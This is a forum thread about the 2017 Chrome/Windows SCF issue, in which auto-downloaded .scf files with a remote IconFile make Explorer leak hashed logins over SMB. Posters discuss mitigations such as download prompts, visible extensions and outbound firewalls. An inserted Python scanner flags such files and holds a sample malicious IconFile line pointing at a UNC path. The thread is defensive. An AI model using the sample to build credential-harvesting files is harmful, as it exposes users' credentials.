Google Chrome Browser Vulnerability – check your “where to save file” settings

    • This topic has 31 replies, 13 voices, and was last updated 6 years ago.
    • #117032

    Last week, a new topic was posted on a vulnerability on Google Chrome Browser over on Code Red – security advisories.   Bosko Stankovic, on defen
    [See the full post at: Google Chrome Browser Vulnerability – check your “where to save file” settings]

    • #117082

      Hi everyone,

      Kirsty, thank you for reporting this issue. For those who don’t know what SCF files are, they are Windows Explorer Command files. Obviously if any SCF file contains malicious commands, then that would be a bad thing for your computer if you ran the SCF file or if a web browser drive-by attack made the SCF file download and execute!

      Everyone, no matter what web browser they use, should change their web browser’s Where To Save Files setting to Always Ask where to save the downloaded file. This is merely an example. What these settings are actually called may be somewhat different in your web browser.

      Changing this setting in Chrome will prevent Chrome from downloading SCF files automatically since the user will instead get a popup window which will ask the user where to save the file with the SCF extension. For the user, this is your “heads up” that you do really really really do not want to download a potentially malicious SCF file!

      Okay, there is nothing to be really paranoid about since many antivirus software programs have behavioral analysis engines which should detect malicious commands within a SCF file. Still, making the above change in whatever web browser you use is a really good idea so that you get a popup from your web browser before you actually download a file from the Internet.

      Finally, all users should configure their Windows computers to NOT hide file extensions. Why? So that you can actually see the true file extension of whatever file you are about to download, or which is already on your computer.

      If you persist in letting Windows hide file extensions, then for example what you might see when downloading a file is: File.TXT which appears to be a simple text file.

      If you configure Windows to NOT hide file extensions, then for the the above example what you would actually see is the file’s true full name and file type: File.TXT.SCF which you now see is a Windows Explorer Command file.

      Best regards,

      –GTP


      • #117091

        Really good tip about not hiding file extensions, thanks @gonetoplaid.

        In terms of the .scf downloading and antivirus:

        “With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one,” Stankovic wrote. This step, he explained, is not optimal from a security standpoint, but for it to cause any harm a user would still need to manually open and run the (.scf) file.

        When a number of anti-virus solutions were tested, none captured the downloaded file as suspicious.

        Needless to say, Chrome deems .scf to be safe…

        The articles linked in both topics on this issue are well worth checking out 🙂

    • #117097

      Settings updated, thanks for the tip!

    • #117103

      … there is nothing to be really paranoid about since many antivirus software programs have behavioral analysis engines which should detect malicious commands within a SCF file.

      I don’t know… from the DefenceCode article:

      Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous.
      All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of Iconfile parameter considering there are no legitimate uses of SCF with remote icon locations.

      Wonder how this download situation works on my stupid android tablet?? Here you can’t really do anything…

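      The DefenceCode note quoted above says SCF analysis only needs a look at the IconFile parameter. The following scanner is an added example of that check written for this thread, not code from DefenceCode or any product: it parses the INI-style .scf text and flags any IconFile that names a UNC path or URL. The sample file contents are constructed; 192.0.2.10 is a documentation-range address, not a real host.

```python
"""Flag .scf (Windows Explorer Command) files whose IconFile points off-box.
Explorer opens an SMB session just to render a remote icon, which is the
credential-leak path the thread discusses, so a remote IconFile is the signal."""
import re
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

# Sample contents constructed for this example (not taken from the thread).
BENIGN_SCF = (
    "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"      # the classic "Show Desktop" file
)
SUSPICIOUS_SCF = (
    "[Shell]\r\nCommand=2\r\n"
    "IconFile=\\\\192.0.2.10\\share\\icon.ico\r\n"  # 192.0.2.0/24 is documentation space
)

# Two leading slashes (either kind), optionally in the \\?\UNC\ form, mark a UNC path.
UNC_RE = re.compile(r"^([\\/]{2})(\?[\\/]UNC[\\/])?\S", re.IGNORECASE)
URL_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parse: {section: {key: value}} with lower-cased names."""
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip().lower()] = value.strip().strip('"')
    return sections


def icon_is_remote(value: str) -> bool:
    """True when the IconFile target (before any ',index' suffix) is a UNC path or URL."""
    target = value.rsplit(",", 1)[0].strip().strip('"')
    return bool(UNC_RE.match(target) or URL_RE.match(target))


def scan_scf_text(text: str) -> List[str]:
    """Return one finding per IconFile entry that points to a remote location."""
    findings = []
    for section, entries in parse_scf(text).items():
        value = entries.get("iconfile")
        if value is not None and icon_is_remote(value):
            findings.append(f"[{section}] IconFile targets a remote location: {value}")
    return findings


def scan_tree(root: Path) -> Iterator[Tuple[Path, List[str]]]:
    """Walk a directory; matching on the final suffix catches names like File.TXT.SCF."""
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() == ".scf":
            findings = scan_scf_text(path.read_text(errors="replace"))
            if findings:
                yield path, findings


if __name__ == "__main__":
    import sys
    for found_path, found in scan_tree(Path(sys.argv[1] if len(sys.argv) > 1 else ".")):
        print(found_path, *found, sep="\n  ")
```

Pointing it at a Downloads folder lists every .scf file whose icon would be fetched over the network; the scan only reads the files and never navigates Explorer into the folder, so it does not itself trigger the SMB request.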
    • #117102

      I don’t understand why this is reported as a Chrome vulnerability. It seems primarily a Windows (Explorer) vulnerability.

      A malicious file could end up on your PC in many ways, a Chrome download is just one of them. But just downloading/copying a file to your drive isn’t enough, it needs to be executed/processed by some software to do the damage.

      So IMO it’s mostly up to Microsoft to fix this. Windows should not be automatically opening SCF files and retrieving their icons from remote SMB servers without user consent. And I’m pretty sure 99.99% of users could do entirely without this SCF functionality.

      • #117135

        It is more of a general browser vulnerability. The default setting is to download ‘safe’ files automatically to a predefined location.

        My question is how are SCF files executed? I am not very familiar with them. I am not sure I have ever seen one in the wild before.

      • #117189

        I agree.  Without the user even trying to execute anything, a two-line text file with a .scf extension lists an IP address of unknown origin as its icon file, and Windows gleefully gives up its hashed password and userID to that IP address, trying to get a remotely linked icon for it, and it’s a Chrome vulnerability?  All Chrome is doing is faithfully saving the file the user asked it to download.  It’s Windows that turns that into a problem!

        I don’t have a problem with .scf files still being in Windows.  There’s nothing wrong with the file format simply existing, even if it’s not used anymore by most people.  But why is Windows trying to parse a link for an icon file out across the WAN, exposing the login credentials’ hash in the process?


        Dell XPS 13/9310, i5-1135G7/16GB, KDE Neon
        XPG Xenia 15, i7-9750H/16GB & GTX1660ti, KDE Neon

      • #117411

        And setting Chrome to “ask before download” does very little when it comes to users who are not tech savvy. It’s like telling them to not download malicious .exe files… yeah, good luck with that. Except it’s even worse, because malicious .exe files need to be opened manually, .scf files open by themselves!

        Even if Chrome completely blocked .scf file downloads, you could still put those in a .zip along other (legit) files and so make sure that the user will navigate to that folder and trigger the .scf. It’s a mess and only Microsoft can fix it.

        • #117492

          @ anonymous#117411

          If a Windows Chrome user does not set it to “Ask before download”, a hacker may inject an infected SCF file as a drive-by download which will be automatically downloaded and saved onto the user’s Download folder without the user’s knowledge.
          Sometime later, there will be a high risk of the user seeing that strange SCF file and opening it = gets infected. This can even happen to a non-dummy user.

    • #117115

      Woody

      What do you think about this?  I think this is something you should comment on, and I’m sure many of your readers would like to hear what you think before I change my settings.

      Thanks

      Sam

      • #117265

        SCF files are rare these days.

        Of course, you should show filename extensions, as @GoneToPlaid says. That’s Step 1 or Step 2 after installing Windows, any version, on any computer – as listed in all of my books.

        As far as “ask where to save each file” — I do that, primarily for convenience. I download so many files that the easiest way to keep them sorted out is to stick them in the right place to begin with.

        And I agree with @Ascaris and @Noel Carboni that this is lousy Windows behavior. An outbound firewall is a good idea – although I don’t use one.

    • #117137

      3+ million files here, and the only .scf files anywhere to be found are the ones delivered with XP x64 in a circa 2005 backup of an ancient system on a backup USB drive.

      What is this functionality still doing in Windows Explorer?

      Anyhow, just in case such a malicious .scf file ever shows up – or if any part of my OS or applications makes any unexpected attempt to “go online” without my permission – I maintain a deny-outgoing-by-default firewall setup. Such communications will be blocked.

      A deny-by-default configuration is a bit difficult to initially set up to match your needs, but once in place it provides inexpensive insurance that communications you don’t want happening really aren’t happening.

      You shouldn’t have to be afraid of what your computer might do online without you!

      For what it’s worth, I have a Sphinx-based deny-by-default firewall setup on two hardware systems and three virtual machines, and the effort I have to put into maintaining them all has dropped to almost nothing – no more than a few minutes a week. It’s proven to be very manageable, and it doesn’t cut into my performance in any noticeable way. Because the firewall software is name-based, it handles all the IP address mutability of the modern internet. The only thing I have to do in an ongoing way is to keep up with changes I choose to make (i.e., if I install new or updated software that does new/different communications I have to choose whether to allow them when the Sphinx UI pops up a notice).

      See also: https://www.askwoody.com/2016/sphinx-windows-firewall-control/

      By comparison the Windows out-of-box firewall is A) set to allow-outgoing-by-default, B) virtually unmanageable if switched to deny-outgoing-by-default since it does not work with names but rather IP addresses, and C) has a poorly accessible log (the Windows Security Event log, whose interface is pretty clunky).

      Just as a test on my Win 8.1 workstation, I set up a test .scf file using a UNC with a Microsoft server name in the iconfile= entry, and sure enough when I navigated into that folder in File Explorer the OS tried to contact the Microsoft server – and was blocked by the firewall (note the red arrows, indicating blocked comms):

      [Screenshot: ScreenGrab_NoelC4_2017_05_21_102616, firewall log with the blocked connection marked by red arrows]

      -Noel

      • #117142

        Just as a test on my Win 8.1 workstation, I set up a test .scf file using a UNC with a Microsoft server name in the iconfile= entry, and sure enough when I navigated into that folder in File Explorer the OS tried to contact the Microsoft server

        Am I interpreting this correctly? The file auto-executed simply by you navigating to the folder it was in in File Explorer.

        That would mean then, if Google saved a file to your Downloads folder automatically (maybe unbeknownst to you, since .scf files are by default hidden), it could auto-execute if you clicked on the Downloads folder?

        • #117149

          I think the point is that File Explorer tried to contact an SMB Server to obtain an icon for the SCF file, not that the command in the file was executed.

          • #117205

            Exactly. And yes, just navigating into the folder containing the .scf file caused the system to initiate the networking activity.

            Specifically, the “iconfile=” entry attempted to retrieve the icon from the UNC path name I had added. In doing so, it tried to make an SMB connection using Windows Networking. A malicious server at the other end would be making note of the specifics of every such request, leading to your username and hashed password being captured by a system that has no business ever seeing that info.

            -Noel

            • #117254

              Thanks @noel-carboni, that confirms the information in last week’s topic.

              Just by accessing a folder containing a malicious SCF file, a user will unwittingly share his computer’s login credentials with an attacker via Google Chrome and the SMB protocol.

              This technique is not new, but a combination of two different techniques, one taken from the Stuxnet operation, and one detailed by a security researcher at the Black Hat security conference.

      • #117165

        Interesting stuff there. I’ve been considering doing a “Deny outgoing by default” setting and just allowing what I need (which I’m pretty sure I could figure out), but isn’t it true that if certain things are blocked, Windows will start to have problems? How do you tell which connections need to be made to MS servers (essential) and which do not?

        As for the browser setting, I’ve had that set to ask me for the location to download to for many, many years. Much easier to find stuff that way. I don’t even use the “Downloads” folder.

        • #117250

          There’s some trial and error in getting a good deny-outgoing-by-default setup. The Sphinx firewall comes with a decent default setup, but I chose to throw it all out and build mine up from scratch. The Sphinx software gives good feedback, so the long and short of it is: You can figure out how to allow just what’s needed with a little bit of effort.

          If you’re interested in using the Sphinx software, PM me. I’ll be happy to make copies of the configs I use available.

          -Noel

          • #117490

            Noel-

            I am on Windows 7 and would like to use the Sphinx firewall to set up a deny-by-default configuration, but I have no idea what system connections can be denied without causing problems.

            Do you have such a list or do you know of any method other trial-and-error for me to find out by myself?

            Thanks for any information you can provide

            -Alice

            • #117682

              Hi Alice, the short answer is: It’s complicated to figure out, but doable.

              The Sphinx software does come with a workable default configuration, though I chose to do it all over.

              I’m willing to share a copy of the configurations I’ve developed for Win 7, 8.1, and 10. Within them there’s my list of certification authority servers that should always be allowed, and my take on how to use the zones and rules and examples of how the applications / system accessories can be set up. They might not be exactly what you need but could serve as a way to see how someone who’s familiar with the product has set it up.

              I’d rather not post a public link to my configs, though. If you’d like a copy please send me a private message via this forum or feel free to eMail me at: NCarboni@ProDigitalSoftware.com

              -Noel

      • #117256

        Is blocking outgoing connections to explorer.exe good enough or do I have to do something else?

        • #117266

          That’s a bit of an oversimplification, though not too bad in the case of Explorer. In my experience Explorer only very rarely normally tries to contact anything via networking. But it’s not zero.

          If you’ve added any Shell Extensions or extensions to Explorer, they might want to contact sites. For example, Classic Shell will occasionally try to check for updates to itself online. You don’t need to allow it; you can take on the entire responsibility to check for updates yourself. I’m just sharing my experience. Classic Shell will continue to run fine if you don’t allow it to contact its mothership.

          There is a possibility that one or more system components – including Explorer though usually not – will want to contact one of the upwards of 100 certification authority sites online. That kind of traffic, to those specific sites, should virtually always be allowed. That being said, it does represent a vector whereby others elsewhere can know your system is online, so you may have privacy concerns.

          And don’t forget that if you DO have a LAN, you might want to choose to allow Explorer to contact your other systems on the LAN, even if you’re blocking comms to the outside world. Again, it’s not really necessary per se – it all comes down to whether you trust the systems inside your LAN.

          -Noel

          • #117288

            I was asking specifically for the SCF vulnerability. Anyway, I tried and blocking explorer.exe does nothing to stop it. The connection is made by “System”, not an isolated process that can be blocked without breaking [who] knows what Windows functionality.

            MS should just give us the option to disable SCF files from being processed. Or better yet make this SCF feature opt-in, it would save us all a lot of potential trouble.

            • #117290

              It is called Software Restriction Policy under Group Policies if you have them available.

            • #117311

              It is called Software Restriction Policy under Group Policies if you have them available.

              Could you please go into a little more detail how that could be used to restrict .scf files from being actively executed? I see that SCF can be added to the list of files considered “executable”, but I’m not sure what that does to mitigate this vulnerability.

              Thanks.

              -Noel

            • #117398

              I use SRP actually, but adding the SCF file extension to the list doesn’t help. The file is still being executed/processed when I open the folder.


            • #117305

              I was asking specifically for the SCF vulnerability. Anyway, I tried and blocking explorer.exe does nothing to stop it. The connection is made by “System”, not an isolated process that can be blocked without breaking [who] knows what Windows functionality.

              Yeah, sorry, I thought that you’d be able to gather that the System is what made the contact in my screen grab above, so I answered a bit more broadly.

              For what it’s worth I normally keep my System, svchost, etc. components on a fairly short leash – they can contact other systems on my LAN freely but they cannot reach the Internet except for some very specific exceptions (i.e., certification authority servers, time servers) normally. I have to reconfigure the firewall to complete a Windows Update.

              -Noel

    • #117943

      A blogpost by Eric Pettit, on medium.com (May 24, 2017), discusses Firefox and Chrome. It is quite interesting reading.

      Browse Against the Machine:
      Some folks might interpret “browse against the machine” as a desperate cry, but it isn’t. Firefox grew in users last year and Mozilla is financially healthier now than it has ever been. Yeah, we’re trying to be provocative to get our word out, with budgets a tiny fraction of our competitors. But we’re frankly more confident in the product than we have ever been in the short time I’ve been here, and it’s starting to show in how we talk to the outside world.

      Firefox gives you the most control over your data and privacy. See private browsing with tracking protection — which Chrome doesn’t have, or our new Focus browser on mobile.

      • #117950

        I stopped reading when I got to…

        Safari and Internet Explorer are just plain bad…

        Sorry, but it just makes me think everyone wants to act like a browser expert because it’s “cool” to do so. This person even works in browser marketing… As if the world needs such a thing.

        People like to rant about IE but it works fine and has arguably one of the best security models. It’s just not set to be very secure out of the box. Of course now Microsoft is leaving IE behind because of their silly push for Apps, but it’s not dead yet.

        I haven’t tried to reconfigure Firefox yet, but last time I opened it on its own it contacted about a dozen different web sites having NOTHING to do with my home page – presumably to support its bloated feature set.

        Mr. Pettit is right about one thing… Google is not to be trusted.

        -Noel

      • #118891

        A response to “Browse Against the Machine” on Computerworld.com, titled “Mozilla execs clash over whether Firefox has a future”.

        See Woody’s blogpost: https://www.askwoody.com/forums/topic/mozilla-execs-clash-over-whether-firefox-has-a-future/

      • #118921

        Yep, with Firefox it is as simple as turning off telemetry so that nothing is sent to anyone. And if you then go into about:config and make three simple changes, you can turn off Firefox’s telemetry gathering altogether. And then you can easily delete all previously gathered telemetry under your Firefox user profile. Mozilla doesn’t hide where the telemetry is stored.

        The above is one reason why I only use Firefox. My other reason for using Firefox is more important to me. Specifically, I do a lot of online research. I use several plugins for Firefox which makes it much easier for me to perform my online research and to gather research data. For whatever you need to do online, more than likely there is a free Firefox plugin because some developer or programmer had the same need and took the time to write a plugin to accomplish that need. This, at least for me, is what mostly makes Firefox stand out as my web browser of choice.
